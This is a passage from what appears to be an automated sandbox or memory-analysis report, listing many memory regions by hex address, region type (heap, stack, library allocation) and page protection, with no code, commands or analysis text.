trusted library allocation
|
page read and write
|
||
6D6A000
|
heap
|
page read and write
|
||
8640000
|
trusted library allocation
|
page execute and read and write
|
||
28FE000
|
stack
|
page read and write
|
||
3300000
|
trusted library allocation
|
page read and write
|
||
A630000
|
trusted library allocation
|
page read and write
|
||
3388000
|
heap
|
page read and write
|
||
7581000
|
heap
|
page read and write
|
||
4DD8000
|
trusted library allocation
|
page read and write
|
||
3370000
|
trusted library allocation
|
page execute and read and write
|
||
4E0E000
|
stack
|
page read and write
|
||
4FC000
|
unkown
|
page execute and write copy
|
||
30C7000
|
heap
|
page read and write
|
||
8D90000
|
heap
|
page read and write
|
||
7FB60000
|
trusted library allocation
|
page execute and read and write
|
||
71F000
|
unkown
|
page execute and read and write
|
||
892D000
|
stack
|
page read and write
|
||
7E5E000
|
stack
|
page read and write
|
||
2909000
|
trusted library allocation
|
page read and write
|
||
8171000
|
heap
|
page read and write
|
||
81F0000
|
trusted library allocation
|
page execute and read and write
|
||
D90000
|
heap
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
30EA000
|
heap
|
page read and write
|
||
7187000
|
trusted library allocation
|
page read and write
|
||
5264000
|
trusted library allocation
|
page read and write
|
||
2EE5000
|
heap
|
page read and write
|
||
5FA9000
|
trusted library allocation
|
page read and write
|
||
6B0E000
|
heap
|
page read and write
|
||
5149000
|
trusted library allocation
|
page read and write
|
||
8F7B000
|
stack
|
page read and write
|
||
7876000
|
heap
|
page read and write
|
||
88BD000
|
stack
|
page read and write
|
||
28F4000
|
trusted library allocation
|
page read and write
|
||
72E0000
|
trusted library allocation
|
page read and write
|
||
BEE000
|
unkown
|
page execute and read and write
|
||
4CF000
|
heap
|
page read and write
|
||
7DB0000
|
trusted library allocation
|
page read and write
|
||
4E40000
|
trusted library allocation
|
page read and write
|
||
47DE000
|
stack
|
page read and write
|
||
7BC9000
|
heap
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
7CAE000
|
stack
|
page read and write
|
||
2B9E000
|
stack
|
page read and write
|
||
3D6E000
|
stack
|
page read and write
|
||
6E40000
|
trusted library allocation
|
page read and write
|
||
4F30000
|
heap
|
page execute and read and write
|
||
78A0000
|
heap
|
page read and write
|
||
6F5000
|
unkown
|
page execute and read and write
|
||
7E1D000
|
stack
|
page read and write
|
||
4F5000
|
heap
|
page read and write
|
||
8A3E000
|
stack
|
page read and write
|
||
5AD000
|
stack
|
page read and write
|
||
2AD0000
|
heap
|
page read and write
|
||
7390000
|
heap
|
page read and write
|
||
178E000
|
stack
|
page read and write
|
||
1639000
|
heap
|
page read and write
|
||
4C5F000
|
stack
|
page read and write
|
||
600000
|
unkown
|
page execute and read and write
|
||
5242000
|
trusted library allocation
|
page read and write
|
||
5FB4000
|
trusted library allocation
|
page read and write
|
||
2CB9000
|
heap
|
page read and write
|
||
756B000
|
stack
|
page read and write
|
||
419E000
|
stack
|
page read and write
|
||
8394000
|
heap
|
page read and write
|
||
3F1F000
|
stack
|
page read and write
|
||
31C0000
|
direct allocation
|
page execute and read and write
|
||
8BCE000
|
stack
|
page read and write
|
||
4EDE000
|
stack
|
page read and write
|
||
2EE0000
|
direct allocation
|
page execute and read and write
|
||
4F2A000
|
trusted library allocation
|
page execute and read and write
|
||
4A8E000
|
stack
|
page read and write
|
||
6D30000
|
heap
|
page execute and read and write
|
||
733E000
|
stack
|
page read and write
|
||
8FDA000
|
heap
|
page read and write
|
||
7F7A8000
|
trusted library allocation
|
page execute and read and write
|
||
55BC000
|
trusted library allocation
|
page read and write
|
||
4728000
|
trusted library allocation
|
page read and write
|
||
625000
|
unkown
|
page execute and read and write
|
||
8005000
|
trusted library allocation
|
page read and write
|
||
4423000
|
trusted library allocation
|
page read and write
|
||
4D79000
|
trusted library allocation
|
page read and write
|
||
8250000
|
trusted library allocation
|
page read and write
|
||
7170000
|
trusted library allocation
|
page read and write
|
||
A574000
|
heap
|
page read and write
|
||
71DC000
|
stack
|
page read and write
|
||
883B000
|
stack
|
page read and write
|
||
7B38000
|
heap
|
page read and write
|
||
7F5C0000
|
trusted library allocation
|
page execute and read and write
|
||
58E4000
|
trusted library allocation
|
page read and write
|
||
6D7D000
|
stack
|
page read and write
|
||
5E0000
|
unkown
|
page execute and read and write
|
||
133E000
|
stack
|
page read and write
|
||
7898000
|
heap
|
page read and write
|
||
42BE000
|
stack
|
page read and write
|
||
31C000
|
unkown
|
page execute and read and write
|
||
57D1000
|
trusted library allocation
|
page read and write
|
||
4F50000
|
trusted library allocation
|
page read and write
|
||
2C8F000
|
stack
|
page read and write
|
||
4F7000
|
unkown
|
page execute and read and write
|
||
72B0000
|
trusted library allocation
|
page read and write
|
||
311E000
|
stack
|
page read and write
|
||
4C8000
|
heap
|
page read and write
|
||
3105000
|
heap
|
page read and write
|
||
30DF000
|
heap
|
page read and write
|
||
329000
|
unkown
|
page execute and read and write
|
||
8003000
|
trusted library allocation
|
page read and write
|
||
8207000
|
trusted library allocation
|
page read and write
|
||
616000
|
unkown
|
page execute and read and write
|
||
484E000
|
stack
|
page read and write
|
||
AA8000
|
unkown
|
page execute and write copy
|
||
14BE000
|
stack
|
page read and write
|
||
6F0E000
|
stack
|
page read and write
|
||
7B00000
|
heap
|
page read and write
|
||
476000
|
unkown
|
page execute and read and write
|
||
4BCE000
|
stack
|
page read and write
|
||
2ADC000
|
heap
|
page read and write
|
||
5552000
|
trusted library allocation
|
page read and write
|
||
6184000
|
trusted library allocation
|
page read and write
|
||
180E000
|
stack
|
page read and write
|
||
3080000
|
heap
|
page read and write
|
||
68D000
|
stack
|
page read and write
|
||
2AFA000
|
heap
|
page read and write
|
||
5FA1000
|
trusted library allocation
|
page read and write
|
||
3AEE000
|
stack
|
page read and write
|
||
8DA1000
|
heap
|
page read and write
|
||
50A6000
|
trusted library allocation
|
page read and write
|
||
DC0000
|
heap
|
page read and write
|
||
A536000
|
heap
|
page read and write
|
||
784D000
|
heap
|
page read and write
|
||
2BFE000
|
stack
|
page read and write
|
||
7570000
|
heap
|
page read and write
|
||
72C3000
|
trusted library allocation
|
page read and write
|
||
33DE000
|
stack
|
page read and write
|
||
816D000
|
heap
|
page read and write
|
||
2B3C000
|
heap
|
page read and write
|
||
8FDE000
|
stack
|
page read and write
|
||
615E000
|
trusted library allocation
|
page read and write
|
||
51A6000
|
trusted library allocation
|
page read and write
|
||
787E000
|
stack
|
page read and write
|
||
3610000
|
heap
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
6DD1000
|
heap
|
page read and write
|
||
8857000
|
heap
|
page read and write
|
||
56F8000
|
trusted library allocation
|
page read and write
|
||
4710000
|
heap
|
page readonly
|
||
2AF4000
|
heap
|
page read and write
|
||
7B8D000
|
stack
|
page read and write
|
||
7FAE000
|
stack
|
page read and write
|
||
6095000
|
trusted library allocation
|
page read and write
|
||
982E000
|
stack
|
page read and write
|
||
2FE0000
|
trusted library allocation
|
page read and write
|
||
4F10000
|
trusted library allocation
|
page read and write
|
||
8ECE000
|
stack
|
page read and write
|
||
7ED6000
|
trusted library allocation
|
page read and write
|
||
7D40000
|
heap
|
page read and write
|
||
4D0E000
|
stack
|
page read and write
|
||
2AEC000
|
direct allocation
|
page execute and read and write
|
||
783D000
|
heap
|
page read and write
|
||
E18000
|
heap
|
page read and write
|
||
3F4E000
|
stack
|
page read and write
|
||
72C000
|
unkown
|
page execute and read and write
|
||
BE9000
|
unkown
|
page execute and read and write
|
||
55F9000
|
trusted library allocation
|
page read and write
|
||
75D3000
|
heap
|
page read and write
|
||
394E000
|
stack
|
page read and write
|
||
7D90000
|
trusted library allocation
|
page read and write
|
||
612B000
|
trusted library allocation
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
2A98000
|
stack
|
page read and write
|
||
4E62000
|
trusted library allocation
|
page read and write
|
||
A92C000
|
stack
|
page read and write
|
||
56B4000
|
trusted library allocation
|
page read and write
|
||
73CAD000
|
unkown
|
page read and write
|
||
8A30000
|
heap
|
page read and write
|
||
64D000
|
stack
|
page read and write
|
||
419F000
|
stack
|
page read and write
|
||
6D87000
|
heap
|
page read and write
|
||
33AA000
|
heap
|
page read and write
|
||
4F4E000
|
stack
|
page read and write
|
||
75AE000
|
stack
|
page read and write
|
||
2ADA000
|
heap
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
3270000
|
heap
|
page read and write
|
||
761B000
|
stack
|
page read and write
|
||
2940000
|
heap
|
page read and write
|
||
8E1E000
|
stack
|
page read and write
|
||
74AD000
|
stack
|
page read and write
|
||
4C3000
|
unkown
|
page execute and read and write
|
||
1E6000
|
unkown
|
page execute and write copy
|
||
8C0E000
|
stack
|
page read and write
|
||
63A000
|
unkown
|
page execute and read and write
|
||
9A9000
|
stack
|
page read and write
|
||
5FC000
|
unkown
|
page execute and read and write
|
||
8110000
|
trusted library allocation
|
page read and write
|
||
4B20000
|
unclassified section
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page read and write
|
||
72FE000
|
stack
|
page read and write
|
||
690D000
|
stack
|
page read and write
|
||
46B0000
|
trusted library allocation
|
page read and write
|
||
233000
|
unkown
|
page execute and read and write
|
||
8C20000
|
trusted library allocation
|
page read and write
|
||
434E000
|
stack
|
page read and write
|
||
A52000
|
unkown
|
page execute and write copy
|
||
4AD7000
|
trusted library allocation
|
page read and write
|
||
4E9E000
|
stack
|
page read and write
|
||
2EC0000
|
heap
|
page read and write
|
||
8ABF000
|
heap
|
page read and write
|
||
8200000
|
trusted library allocation
|
page read and write
|
||
4610000
|
heap
|
page execute and read and write
|
||
1480000
|
heap
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
330F000
|
stack
|
page read and write
|
||
3DDF000
|
stack
|
page read and write
|
||
7710000
|
trusted library allocation
|
page read and write
|
||
4C0000
|
unkown
|
page readonly
|
||
4CDE000
|
stack
|
page read and write
|
||
8B02000
|
heap
|
page read and write
|
||
998F000
|
stack
|
page read and write
|
||
83E8000
|
heap
|
page read and write
|
||
D40000
|
heap
|
page read and write
|
||
76AE000
|
stack
|
page read and write
|
||
E42000
|
heap
|
page read and write
|
||
4600000
|
heap
|
page read and write
|
||
470E000
|
stack
|
page read and write
|
||
506000
|
heap
|
page read and write
|
||
3320000
|
heap
|
page read and write
|
||
75E0000
|
trusted library allocation
|
page read and write
|
||
4FB3000
|
trusted library allocation
|
page read and write
|
||
6F4E000
|
stack
|
page read and write
|
||
46C0000
|
heap
|
page read and write
|
||
7BA0000
|
trusted library allocation
|
page read and write
|
||
3180000
|
unclassified section
|
page read and write
|
||
774B000
|
stack
|
page read and write
|
||
6E31000
|
heap
|
page read and write
|
||
8610000
|
trusted library allocation
|
page read and write
|
||
83E0000
|
heap
|
page read and write
|
||
2E86000
|
heap
|
page read and write
|
||
8850000
|
trusted library allocation
|
page read and write
|
||
50AE000
|
stack
|
page read and write
|
||
73CAD000
|
unkown
|
page read and write
|
||
8737000
|
trusted library allocation
|
page read and write
|
||
38AE000
|
stack
|
page read and write
|
||
8A20000
|
trusted library allocation
|
page read and write
|
||
7650000
|
trusted library allocation
|
page read and write
|
||
60F7000
|
trusted library allocation
|
page read and write
|
||
8120000
|
trusted library allocation
|
page read and write
|
||
7C77000
|
trusted library allocation
|
page read and write
|
||
3090000
|
heap
|
page read and write
|
||
2FB0000
|
trusted library allocation
|
page read and write
|
||
8C20000
|
trusted library allocation
|
page read and write
|
||
78F1000
|
heap
|
page read and write
|
||
50FA000
|
trusted library allocation
|
page read and write
|
||
4F8000
|
unkown
|
page execute and write copy
|
||
302E000
|
stack
|
page read and write
|
||
4F37000
|
trusted library allocation
|
page execute and read and write
|
||
2D80000
|
trusted library allocation
|
page read and write
|
||
2E27000
|
heap
|
page read and write
|
||
7FF0000
|
trusted library allocation
|
page read and write
|
||
6071000
|
trusted library allocation
|
page read and write
|
||
8FFC000
|
stack
|
page read and write
|
||
8DA8000
|
heap
|
page read and write
|
||
2E29000
|
heap
|
page read and write
|
||
4861000
|
trusted library allocation
|
page read and write
|
||
8F9F000
|
heap
|
page read and write
|
||
82AD000
|
stack
|
page read and write
|
||
2977000
|
heap
|
page read and write
|
||
698E000
|
stack
|
page read and write
|
||
46CE000
|
stack
|
page read and write
|
||
3AAE000
|
stack
|
page read and write
|
||
2FFF000
|
stack
|
page read and write
|
||
7FEE000
|
stack
|
page read and write
|
||
1C0000
|
unkown
|
page readonly
|
||
2D48000
|
heap
|
page read and write
|
||
53F1000
|
trusted library allocation
|
page read and write
|
||
4DB8000
|
trusted library allocation
|
page read and write
|
||
3310000
|
heap
|
page read and write
|
||
446E000
|
stack
|
page read and write
|
||
7230000
|
trusted library allocation
|
page read and write
|
||
4665000
|
trusted library allocation
|
page execute and read and write
|
||
2E3E000
|
stack
|
page read and write
|
||
4D30000
|
trusted library section
|
page read and write
|
||
AA6000
|
unkown
|
page execute and write copy
|
||
7078000
|
trusted library allocation
|
page read and write
|
||
72A0000
|
heap
|
page execute and read and write
|
||
7B7B000
|
heap
|
page read and write
|
||
50FC000
|
trusted library allocation
|
page read and write
|
||
7680000
|
trusted library allocation
|
page read and write
|
||
8A2C000
|
heap
|
page read and write
|
||
4DC000
|
heap
|
page read and write
|
||
4FE000
|
unkown
|
page execute and write copy
|
||
6D0000
|
heap
|
page read and write
|
||
6C8E000
|
stack
|
page read and write
|
||
7D9B000
|
heap
|
page read and write
|
||
3D0E000
|
stack
|
page read and write
|
||
7090000
|
heap
|
page read and write
|
||
73CA6000
|
unkown
|
page readonly
|
||
6E4F000
|
stack
|
page read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
46CE000
|
stack
|
page read and write
|
||
76B0000
|
trusted library allocation
|
page read and write
|
||
72C7000
|
trusted library allocation
|
page read and write
|
||
73E4000
|
heap
|
page read and write
|
||
6E3F000
|
stack
|
page read and write
|
||
4B30000
|
heap
|
page read and write
|
||
8375000
|
heap
|
page read and write
|
||
2A80000
|
direct allocation
|
page execute and read and write
|
||
1293000
|
heap
|
page read and write
|
||
7120000
|
trusted library allocation
|
page read and write
|
||
4DDF000
|
stack
|
page read and write
|
||
3329000
|
heap
|
page read and write
|
||
6F8E000
|
stack
|
page read and write
|
||
3600000
|
trusted library allocation
|
page read and write
|
||
8100000
|
trusted library allocation
|
page execute and read and write
|
||
57D1000
|
trusted library allocation
|
page read and write
|
||
4D92000
|
trusted library allocation
|
page read and write
|
||
2E4B000
|
heap
|
page read and write
|
||
73A1000
|
heap
|
page read and write
|
||
3A8E000
|
stack
|
page read and write
|
||
83CC000
|
stack
|
page read and write
|
||
7B0F000
|
stack
|
page read and write
|
||
762E000
|
stack
|
page read and write
|
||
7DC1000
|
heap
|
page read and write
|
||
765000
|
unkown
|
page execute and read and write
|
||
7800000
|
trusted library allocation
|
page read and write
|
||
4FF000
|
unkown
|
page execute and read and write
|
||
7CF0000
|
trusted library allocation
|
page execute and read and write
|
||
5A1C000
|
trusted library allocation
|
page read and write
|
||
3C2E000
|
stack
|
page read and write
|
||
2DC8000
|
heap
|
page read and write
|
||
73C90000
|
unkown
|
page readonly
|
||
4B7F000
|
stack
|
page read and write
|
||
4E1E000
|
stack
|
page read and write
|
||
6EE0000
|
heap
|
page execute and read and write
|
||
E1E000
|
heap
|
page read and write
|
||
4C08000
|
trusted library allocation
|
page read and write
|
||
6C2D000
|
stack
|
page read and write
|
||
480E000
|
stack
|
page read and write
|
||
3A1F000
|
stack
|
page read and write
|
||
8330000
|
heap
|
page read and write
|
||
78AE000
|
stack
|
page read and write
|
||
87E000
|
stack
|
page read and write
|
||
4F52000
|
trusted library allocation
|
page read and write
|
||
2D50000
|
trusted library section
|
page read and write
|
||
5953000
|
trusted library allocation
|
page read and write
|
||
E5B000
|
heap
|
page read and write
|
||
75B0000
|
trusted library allocation
|
page execute and read and write
|
||
6D2D000
|
stack
|
page read and write
|
||
5FB000
|
unkown
|
page execute and read and write
|
||
2ED0000
|
heap
|
page read and write
|
||
73CAD000
|
unkown
|
page read and write
|
||
76A0000
|
trusted library allocation
|
page read and write
|
||
4E72000
|
trusted library allocation
|
page read and write
|
||
469D000
|
stack
|
page read and write
|
||
5716000
|
trusted library allocation
|
page read and write
|
||
2AF3000
|
heap
|
page read and write
|
||
77C0000
|
trusted library allocation
|
page read and write
|
||
7100000
|
trusted library allocation
|
page read and write
|
||
597A000
|
trusted library allocation
|
page read and write
|
||
30E7000
|
heap
|
page read and write
|
||
4E1E000
|
stack
|
page read and write
|
||
2D4000
|
unkown
|
page execute and read and write
|
||
7FDF000
|
trusted library allocation
|
page read and write
|
||
72F0000
|
trusted library allocation
|
page read and write
|
||
441F000
|
stack
|
page read and write
|
||
297C000
|
stack
|
page read and write
|
||
7460000
|
heap
|
page execute and read and write
|
||
6D2D000
|
heap
|
page read and write
|
||
4F60000
|
heap
|
page read and write
|
||
41DE000
|
stack
|
page read and write
|
||
2FC0000
|
trusted library allocation
|
page read and write
|
||
8A20000
|
heap
|
page read and write
|
||
8FBE000
|
stack
|
page read and write
|
||
4F70000
|
heap
|
page read and write
|
||
31A0000
|
direct allocation
|
page execute and read and write
|
||
7670000
|
trusted library allocation
|
page read and write
|
||
2B2E000
|
stack
|
page read and write
|
||
2C9E000
|
stack
|
page read and write
|
||
6101000
|
trusted library allocation
|
page read and write
|
||
2970000
|
heap
|
page read and write
|
||
2D6E000
|
stack
|
page read and write
|
||
2FD0000
|
trusted library allocation
|
page read and write
|
||
32E0000
|
direct allocation
|
page execute and read and write
|
||
2B28000
|
heap
|
page read and write
|
||
4F80000
|
trusted library allocation
|
page read and write
|
||
3D0E000
|
stack
|
page read and write
|
||
4F20000
|
trusted library allocation
|
page read and write
|
||
751E000
|
stack
|
page read and write
|
||
46A0000
|
trusted library allocation
|
page read and write
|
||
305E000
|
stack
|
page read and write
|
||
2A20000
|
heap
|
page read and write
|
||
8853000
|
heap
|
page read and write
|
||
5916000
|
trusted library allocation
|
page read and write
|
||
8491000
|
heap
|
page read and write
|
||
2A9D000
|
stack
|
page read and write
|
||
7280000
|
heap
|
page read and write
|
||
12DC000
|
heap
|
page read and write
|
||
5E96000
|
trusted library allocation
|
page read and write
|
||
817D000
|
heap
|
page read and write
|
||
9940000
|
trusted library allocation
|
page read and write
|
||
2AC0000
|
direct allocation
|
page execute and read and write
|
||
6FEE000
|
stack
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
84B2000
|
trusted library allocation
|
page read and write
|
||
78BE000
|
stack
|
page read and write
|
||
84D0000
|
trusted library allocation
|
page execute and read and write
|
||
3040000
|
heap
|
page read and write
|
||
2E50000
|
heap
|
page read and write
|
||
2B26000
|
heap
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
4AF7000
|
trusted library allocation
|
page read and write
|
||
8C50000
|
trusted library allocation
|
page execute and read and write
|
||
E66000
|
heap
|
page read and write
|
||
51A4000
|
trusted library allocation
|
page read and write
|
||
4E2E000
|
stack
|
page read and write
|
||
291A000
|
trusted library allocation
|
page execute and read and write
|
||
7700000
|
trusted library allocation
|
page read and write
|
||
7833000
|
heap
|
page read and write
|
||
301E000
|
stack
|
page read and write
|
||
2AF7000
|
heap
|
page read and write
|
||
1E2000
|
unkown
|
page execute and write copy
|
||
8740000
|
trusted library allocation
|
page read and write
|
||
8342000
|
heap
|
page read and write
|
||
7A00000
|
trusted library allocation
|
page execute and read and write
|
||
13A5000
|
heap
|
page read and write
|
||
66B000
|
unkown
|
page execute and read and write
|
||
9B6E000
|
stack
|
page read and write
|
||
28E0000
|
heap
|
page read and write
|
||
57A000
|
unkown
|
page execute and read and write
|
||
2870000
|
heap
|
page read and write
|
||
700A000
|
stack
|
page read and write
|
||
4CBC000
|
stack
|
page read and write
|
||
4E60000
|
trusted library allocation
|
page read and write
|
||
1296000
|
heap
|
page read and write
|
||
47DE000
|
stack
|
page read and write
|
||
719E000
|
stack
|
page read and write
|
||
8390000
|
trusted library allocation
|
page read and write
|
||
2DC8000
|
stack
|
page read and write
|
||
2AE8000
|
heap
|
page read and write
|
||
7130000
|
trusted library allocation
|
page read and write
|
||
6FCB000
|
stack
|
page read and write
|
||
47B000
|
unkown
|
page execute and read and write
|
||
92EE000
|
stack
|
page read and write
|
||
2AF5000
|
heap
|
page read and write
|
||
811B000
|
trusted library allocation
|
page read and write
|
||
51DF000
|
trusted library allocation
|
page read and write
|
||
319F000
|
stack
|
page read and write
|
||
754B000
|
stack
|
page read and write
|
||
542E000
|
trusted library allocation
|
page read and write
|
||
35F3000
|
trusted library allocation
|
page execute and read and write
|
||
1350000
|
heap
|
page read and write
|
||
47E8000
|
trusted library allocation
|
page read and write
|
||
721E000
|
stack
|
page read and write
|
||
2C00000
|
heap
|
page read and write
|
||
8F80000
|
heap
|
page read and write
|
||
6A50000
|
heap
|
page execute and read and write
|
||
D97000
|
heap
|
page read and write
|
||
8600000
|
trusted library allocation
|
page execute and read and write
|
||
7650000
|
trusted library allocation
|
page read and write
|
||
6ECA000
|
stack
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
51D7000
|
trusted library allocation
|
page read and write
|
||
516C000
|
trusted library allocation
|
page read and write
|
||
796000
|
unkown
|
page execute and read and write
|
||
2DC0000
|
heap
|
page read and write
|
||
2DEA000
|
heap
|
page read and write
|
||
4FA0000
|
heap
|
page execute and read and write
|
||
513A000
|
trusted library allocation
|
page read and write
|
||
2AF5000
|
heap
|
page read and write
|
||
7E94000
|
trusted library allocation
|
page read and write
|
||
6E8D000
|
stack
|
page read and write
|
||
2F90000
|
trusted library allocation
|
page read and write
|
||
6DE8000
|
heap
|
page read and write
|
||
8198000
|
heap
|
page read and write
|
||
4420000
|
direct allocation
|
page read and write
|
||
8A7F000
|
stack
|
page read and write
|
||
2CA0000
|
heap
|
page read and write
|
||
DB0000
|
heap
|
page read and write
|
||
2AFA000
|
heap
|
page read and write
|
||
8970000
|
trusted library allocation
|
page read and write
|
||
515D000
|
trusted library allocation
|
page read and write
|
||
7D50000
|
heap
|
page read and write
|
||
73CA6000
|
unkown
|
page readonly
|
||
430E000
|
stack
|
page read and write
|
||
6111000
|
trusted library allocation
|
page read and write
|
||
4F9E000
|
stack
|
page read and write
|
||
8DCE000
|
stack
|
page read and write
|
||
4C2000
|
unkown
|
page execute and write copy
|
||
9002000
|
heap
|
page read and write
|
||
2E70000
|
direct allocation
|
page execute and read and write
|
||
688E000
|
stack
|
page read and write
|
||
4ACC000
|
trusted library allocation
|
page read and write
|
||
9DAE000
|
stack
|
page read and write
|
||
2DA0000
|
trusted library allocation
|
page read and write
|
||
74EB000
|
stack
|
page read and write
|
||
12DA000
|
heap
|
page read and write
|
||
7F50000
|
trusted library allocation
|
page execute and read and write
|
||
73DE000
|
heap
|
page read and write
|
||
8317000
|
heap
|
page read and write
|
||
554A000
|
trusted library allocation
|
page read and write
|
||
3E0E000
|
stack
|
page read and write
|
||
78B1000
|
heap
|
page read and write
|
||
735B000
|
stack
|
page read and write
|
||
36AE000
|
stack
|
page read and write
|
||
750F000
|
stack
|
page read and write
|
||
8A29000
|
trusted library allocation
|
page read and write
|
||
82B8000
|
heap
|
page read and write
|
||
7F540000
|
trusted library allocation
|
page execute and read and write
|
||
485000
|
heap
|
page read and write
|
||
450000
|
unkown
|
page readonly
|
||
830E000
|
stack
|
page read and write
|
||
55DB000
|
trusted library allocation
|
page read and write
|
||
30D8000
|
heap
|
page read and write
|
||
4F56000
|
trusted library allocation
|
page execute and read and write
|
||
40EF000
|
stack
|
page read and write
|
||
306E000
|
stack
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
33B7000
|
heap
|
page read and write
|
||
326D000
|
stack
|
page read and write
|
||
54BD000
|
trusted library allocation
|
page read and write
|
||
694A000
|
stack
|
page read and write
|
||
75EB000
|
trusted library allocation
|
page read and write
|
||
4C1000
|
unkown
|
page execute and read and write
|
||
6E3E000
|
stack
|
page read and write
|
||
D40000
|
unkown
|
page execute and write copy
|
||
138E000
|
stack
|
page read and write
|
||
1435000
|
heap
|
page read and write
|
||
70AD000
|
stack
|
page read and write
|
||
4379000
|
stack
|
page read and write
|
||
6DB9000
|
stack
|
page read and write
|
||
3470000
|
heap
|
page read and write
|
||
6EBE000
|
stack
|
page read and write
|
||
328E000
|
stack
|
page read and write
|
||
75EE000
|
stack
|
page read and write
|
||
4F26000
|
trusted library allocation
|
page execute and read and write
|
||
3120000
|
heap
|
page read and write
|
||
4914000
|
trusted library allocation
|
page read and write
|
||
5100000
|
heap
|
page read and write
|
||
C10000
|
heap
|
page read and write
|
||
8EF0000
|
trusted library allocation
|
page execute and read and write
|
||
7D6D000
|
stack
|
page read and write
|
||
422E000
|
stack
|
page read and write
|
||
7180000
|
trusted library allocation
|
page read and write
|
||
3301000
|
direct allocation
|
page execute and read and write
|
||
2DC0000
|
heap
|
page read and write
|
||
89FD000
|
stack
|
page read and write
|
||
4F20000
|
heap
|
page execute and read and write
|
||
8920000
|
trusted library allocation
|
page execute and read and write
|
||
4D9000
|
unkown
|
page execute and read and write
|
||
3723000
|
trusted library allocation
|
page execute and read and write
|
||
514D000
|
trusted library allocation
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
4D9000
|
heap
|
page read and write
|
||
48E000
|
unkown
|
page execute and read and write
|
||
5679000
|
trusted library allocation
|
page read and write
|
||
A15E000
|
stack
|
page read and write
|
||
782000
|
unkown
|
page execute and read and write
|
||
8ACC000
|
heap
|
page read and write
|
||
458E000
|
stack
|
page read and write
|
||
3020000
|
heap
|
page read and write
|
||
73CA6000
|
unkown
|
page readonly
|
||
4275000
|
heap
|
page execute and read and write
|
||
3E0E000
|
stack
|
page read and write
|
||
7790000
|
trusted library allocation
|
page read and write
|
||
901C000
|
heap
|
page read and write
|
||
7F3C8000
|
trusted library allocation
|
page execute and read and write
|
||
10DF000
|
stack
|
page read and write
|
||
28FD000
|
trusted library allocation
|
page execute and read and write
|
||
8E0E000
|
stack
|
page read and write
|
||
6CEE000
|
stack
|
page read and write
|
||
33E0000
|
heap
|
page read and write
|
||
73CAD000
|
unkown
|
page read and write
|
||
300F000
|
stack
|
page read and write
|
||
2B3C000
|
heap
|
page read and write
|
||
38DF000
|
stack
|
page read and write
|
||
4F60000
|
trusted library allocation
|
page read and write
|
||
8650000
|
trusted library allocation
|
page read and write
|
||
7400000
|
heap
|
page execute and read and write
|
||
7849000
|
heap
|
page read and write
|
||
76D0000
|
trusted library allocation
|
page read and write
|
||
2910000
|
direct allocation
|
page execute and read and write
|
||
2AFD000
|
heap
|
page read and write
|
||
775E000
|
stack
|
page read and write
|
||
2E10000
|
heap
|
page read and write
|
||
28F0000
|
trusted library allocation
|
page read and write
|
||
7D80000
|
trusted library allocation
|
page execute and read and write
|
||
32F0000
|
direct allocation
|
page execute and read and write
|
||
464000
|
unkown
|
page execute and read and write
|
||
2FC9000
|
stack
|
page read and write
|
||
78A6000
|
heap
|
page read and write
|
||
77F0000
|
trusted library allocation
|
page read and write
|
||
8230000
|
trusted library allocation
|
page execute and read and write
|
||
7F0D0000
|
trusted library allocation
|
page execute and read and write
|
||
960F000
|
stack
|
page read and write
|
||
5F81000
|
trusted library allocation
|
page read and write
|
||
731D000
|
stack
|
page read and write
|
||
4D60000
|
trusted library allocation
|
page read and write
|
||
6D4D000
|
heap
|
page read and write
|
||
4DA000
|
heap
|
page read and write
|
||
C09000
|
unkown
|
page execute and read and write
|
||
55F6000
|
trusted library allocation
|
page read and write
|
||
2AFE000
|
direct allocation
|
page execute and read and write
|
||
70F0000
|
trusted library allocation
|
page read and write
|
||
32C9000
|
trusted library allocation
|
page read and write
|
||
33F1000
|
heap
|
page read and write
|
||
2947000
|
heap
|
page read and write
|
||
3F5E000
|
stack
|
page read and write
|
||
2E13000
|
heap
|
page read and write
|
||
723B000
|
trusted library allocation
|
page read and write
|
||
8FE1000
|
heap
|
page read and write
|
||
2B00000
|
heap
|
page read and write
|
||
324000
|
unkown
|
page execute and read and write
|
||
7A4E000
|
stack
|
page read and write
|
||
753A000
|
heap
|
page read and write
|
||
6133000
|
trusted library allocation
|
page read and write
|
||
4D97000
|
heap
|
page read and write
|
||
4AF0000
|
trusted library allocation
|
page read and write
|
||
D10000
|
heap
|
page read and write
|
||
E10000
|
heap
|
page read and write
|
||
708B000
|
stack
|
page read and write
|
||
4B80000
|
heap
|
page readonly
|
||
768000
|
unkown
|
page execute and read and write
|
||
4C40000
|
trusted library allocation
|
page execute and read and write
|
||
56AB000
|
trusted library allocation
|
page read and write
|
||
2FDA000
|
trusted library allocation
|
page execute and read and write
|
||
30E0000
|
heap
|
page read and write
|
||
737F000
|
stack
|
page read and write
|
||
3DDE000
|
stack
|
page read and write
|
||
2AD4000
|
heap
|
page read and write
|
||
21B000
|
unkown
|
page execute and read and write
|
||
4DA000
|
heap
|
page read and write
|
||
42DE000
|
stack
|
page read and write
|
||
2A20000
|
direct allocation
|
page execute and read and write
|
||
7465000
|
heap
|
page execute and read and write
|
||
7C52000
|
trusted library allocation
|
page read and write
|
||
8369000
|
heap
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
31F0000
|
heap
|
page read and write
|
||
4DA000
|
heap
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page read and write
|
||
7FB78000
|
trusted library allocation
|
page execute and read and write
|
||
7C4F000
|
stack
|
page read and write
|
||
5EB6000
|
trusted library allocation
|
page read and write
|
||
890E000
|
stack
|
page read and write
|
||
50C9000
|
trusted library allocation
|
page read and write
|
||
E9F000
|
heap
|
page read and write
|
||
4D3000
|
heap
|
page read and write
|
||
5FE8000
|
trusted library allocation
|
page read and write
|
||
937E000
|
stack
|
page read and write
|
||
1400000
|
heap
|
page read and write
|
||
6DCB000
|
stack
|
page read and write
|
||
770E000
